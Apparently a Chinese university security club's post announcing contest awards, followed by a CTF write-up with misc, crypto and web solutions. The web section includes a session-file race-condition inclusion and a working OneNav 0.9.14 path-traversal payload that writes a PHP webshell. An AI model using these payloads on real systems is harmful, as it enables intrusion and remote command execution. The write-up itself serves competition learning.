2022年12月1日,我社成员参加了信创大赛。对于此次比赛,网络安全社团的两支队伍参赛取得优异成绩,在技能类-网络安全赛项中分别取得了一等奖和二等奖。21级的同学们对待比赛认真专注,以执着、热爱的精神在此次网络安全大赛中大放异彩。
场景实操环节
比赛实时排名情况
比赛获奖情况
misc
misc_pyc
题目给了一个pyc,先用uncompyle6反编译
import base64
flag_2 = '*****'
bin_str = ''.join([bin(ord(c)).replace('0b', '').zfill(8) for c in flag_2])
base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
with open('0.txt', 'rb') as (f0):
with open('1.txt', 'wb') as (f1):
for line in f0.readlines():
rowstr = base64.b64encode(line.replace(b'n', b''))
equalnum = rowstr.count(b'=')
if equalnum:
if len(bin_str):
offset = int('0b' + bin_str[:equalnum * 2], 2)
char = rowstr[(len(rowstr) - equalnum - 1)]
char = chr(char)
rowstr = rowstr.replace(char.encode(), base64chars[(base64chars.index(char) + offset)].encode())
bin_str = bin_str[equalnum * 2:]
f1.write(rowstr + b'n')
what_f1_write = [
'YQ1=',
'Yg3=',
'Yw0=',
'ZA3=',
'ZQ1=',
'Zg0=',
'Zw1=',
'aA1=',
'aQ0=',
'ag3=',
'aw1=',
'bA2=',
'bQ0=',
'bg3=',
'bw1=',
'cA0=',
'cQ1=',
'cg3=',
'c9==']看起来是base64隐写,找个解题脚本简单改一下
import base64
b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
what_f1_write = ['YQ1=','Yg3=','Yw0=','ZA3=','ZQ1=','Zg0=','Zw1=','aA1=','aQ0=','ag3=',
'aw1=','bA2=','bQ0=','bg3=','bw1=','cA0=','cQ1=','cg3=','c9==']
bin_str = ''
for stegb64 in what_f1_write:
# stegb64 = str(line, "utf-8").strip("n")
rowb64 = str(base64.b64encode(base64.b64decode(stegb64)), "utf-8").strip("n")
offset = abs(b64chars.index(stegb64.replace('=', '').replace('r','')[-1]) - b64chars.index(rowb64.replace('=', '')[-1]))
equalnum = stegb64.count('=') # no equalnum no offset
if equalnum:
bin_str += bin(offset)[2:].zfill(equalnum * 2)
print(''.join([chr(int(bin_str[i:i + 8], 2)) for i in range(0, len(bin_str), 8)]))得到结果 sE64}
再去用pyc隐写解前半段
拼起来得到
flag{pyc&bAsE64}好玩的编码
5230307a5631465756444a4e576c6c4852566c4d4d6b3953535555794d30745454454a4a52454e54576c704a556b5a584e6b355454453431574668425430784b546c704a555430395054303d解hex16:
R00zV1FWVDJNWllHRVlMMk9SSUUyM0tTTEJJRENTWlpJUkZXNk5TTE41WFhBT0xKTlpJUT09PT0=magic:base32再58:
flag{W0w_You_ar3_great}happyImg
stegsolve左右翻发现一个密码:
!QAZXSW@1qazxsw2
lsb隐写,red,blue为0。
保存为bin,记事本打开看到flag.png,改名为压缩包,输入密码,得到flag
网络寻综
看图是哈穆迪清真寺
谷歌搜mosquee AI-Hamoudi phone
看到电话
flag{+25377865774}crypto
3des
给了一个java文件和一个加密结果
算法就是tripleDES
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
class Crypto {
private static String KEY = "@2AzsQ#Hnx%XTosMR6$LtEKD";
private static String IV = "CpEF7SDz";
public static String encrypt(String data) throws Exception {
Cipher cipher = Cipher.getInstance("DESede/CBC/PKCS5Padding");
SecretKeySpec secretKeySpec = new SecretKeySpec(KEY.getBytes(), "DESede");
IvParameterSpec ivParameterSpec = new IvParameterSpec(IV.getBytes());
cipher.init(Cipher.ENCRYPT_MODE, secretKeySpec, ivParameterSpec);
byte[] encrypted = cipher.doFinal(data.getBytes("UTF-8"));
return bytes2hexstr(encrypted);
}
public static String bytes2hexstr(byte[] buf) {
StringBuffer sb = new StringBuffer();
for (int i = 0; i < buf.length; i++) {
String hex = Integer.toHexString(buf[i] & 0xFF);
if (hex.length() == 1) {
hex = '0' + hex;
}
sb.append(hex.toLowerCase());
}
return sb.toString();
}
public static void main(String[] args) throws Exception {
System.out.println(encrypt("flag{xxx}"));
}
}key=@2AzsQ#Hnx%XTosMR6$LtEKD
IV=CpEF7SDz
算法CBC/PKCS5Padding
happyRSA
给了pqenc
但是e是phi_n的因数
用AMM在有限域内开方
#sage
from Crypto.Util.number import *
import gmpy2
import time
import random
from tqdm import tqdm
p = 97559992143538505823351615639211763734311559951587665014345919747733390740450790273359386575890798160795025626573580365828156108078100621074495137190416226109270591884516099679926053478560750986193065549865131400457769381398338702594631516054868885157801055786648957386508374821243393633398068286519087291899
e = 223
q = 305441694023646712448997551501420161654473174790323208128426716523786159389593732096324499033892465876683490515456465981922248571768795221792067055550876465089846480000103207743072486330333647531692833975457277965585913100536970416049033758578728704151353769882703817603346904165274693820583811661679269246933
c = 8310151988085860771226135398874764307621316769660563267495107758782855420167201345224621932233009864886459191650276831555553606018772356624861344010051427084784712615419584399034171295434663517111130692609510225248850800086750351336299722121740091690781297611587292792380263994661373171593543809045588215109967008287273462651359353786188222933360961215432623197670015133463997036747979075992284955864774118038735419327630590319728196257908297742808557311174379279085833900573941668601788656519597930019583786869324790276024107739682158108450127890693464079075924933789639419538796893294354565682012619667240947317948
n = p*q
def AMM(o, r, q):
start = time.time()
print('n----------------------------------------------------------------------------------')
print('Start to run Adleman-Manders-Miller Root Extraction Method')
print('Try to find one {:#x}th root of {} modulo {}'.format(r, o, q))
g = GF(q)
o = g(o)
p = g(random.randint(1, q))
while p ^ ((q-1) // r) == 1:
p = g(random.randint(1, q))
print('[+] Find p:{}'.format(p))
t = 0
s = q - 1
while s % r == 0:
t += 1
s = s // r
print('[+] Find s:{}, t:{}'.format(s, t))
k = 1
while (k * s + 1) % r != 0:
k += 1
alp = (k * s + 1) // r
print('[+] Find alp:{}'.format(alp))
a = p ^ (r**(t-1) * s)
b = o ^ (r*alp - 1)
c = p ^ s
h = 1
for i in range(1, t):
d = b ^ (r^(t-1-i))
if d == 1:
j = 0
else:
print('[+] Calculating DLP...')
j = - discrete_log(d, a)
print('[+] Finish DLP...')
b = b * (c^r)^j
h = h * c^j
c = c^r
result = o^alp * h
end = time.time()
print("Finished in {} seconds.".format(end - start))
print('Find one solution: {}'.format(result))
return result
def onemod(p,r):
t=p-2
while pow(t,(p-1) // r,p)==1:
t -= 1
return pow(t,(p-1) // r,p)
def solution(p,root,e):
g = onemod(p,e)
may = set()
for i in range(e):
may.add(root * pow(g,i,p)%p)
return may
def union(x1, x2):
a1, m1 = x1
a2, m2 = x2
d = gmpy2.gcd(m1, m2)
assert (a2 - a1) % d == 0
p1,p2 = m1 // d,m2 // d
_,l1,l2 = gmpy2.gcdext(p1,p2)
k = -((a1 - a2) // d) * l1
lcm = gmpy2.lcm(m1,m2)
ans = (a1 + k * m1) % lcm
return ans,lcm
def excrt(ai,mi):
tmp = zip(ai,mi)
return reduce(union, tmp)
cp = c % p
cq = c % q
mp = AMM(cp,e,p)
mq = AMM(cq,e,q)
mps = solution(p,mp,e)
mqs = solution(q,mq,e)
for mpp in tqdm(mps):
for mqq in mqs:
ai = [int(mpp),int(mqq)]
mi = [p,q]
m = CRT_list(ai,mi)
flag = long_to_bytes(m)
if b'flag' in flag:
print(flag)
exit(0)web
多页面爬取
抓包爆破 每一个页面下的字母合并即可
lfi_system
dirsearch扫描 发现php.php
寻找到 session.upload_progress.enabled = on开启的
由于session.upload_progress.cleanup默认开启 需要利用条件竞争来读取session文件
https://blog.csdn.net/qq_46918279/article/details/120106832#WEB82-session文件包含
采用bp抓包手动爆破
构造上传文件的页面,对环境上传文件,然后抓包
<!DOCTYPE html>
<html>
<body>
<form action="http://47.105.39.3:22003/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="2333" />
<input type="file" name="file" />
<input type="submit" value="submit" />
</form>
</body>
</html>
<?php
session_start();
?>
修改上传文件包 包含session文件,抓包
设置两项 条件竞争即可
onenav
打开发现为onenav框架,通过github查看源码得知存在version.txt文件。访问可以得到版本号为0.9.14
搜索相应版本漏洞,在github发现存在路径穿越漏洞,但没有详细,对比0.9.14与0.9.15发现最后过滤了 ../ 与 ./ ,且后面once_include()中存在可控参数
接着通过pearcmd执行系统命令即可,本来想反弹shell,但发现空格绕过一直绕不过去,最后想到直接获取$_POST参数来执行命令就是了。
payload:
/index.php?+config-create+/&c=../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=system($_POST['a'])?>+/tmp/hello1.php
长
按
关
注
网络安全社团公众号
微信号 : qlnu_ctf
新浪微博:齐鲁师范学院网络安全社团
原文始发于微信公众号(齐鲁师院网络安全社团):山东省“技能兴鲁”职业技能大赛WriteUp
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论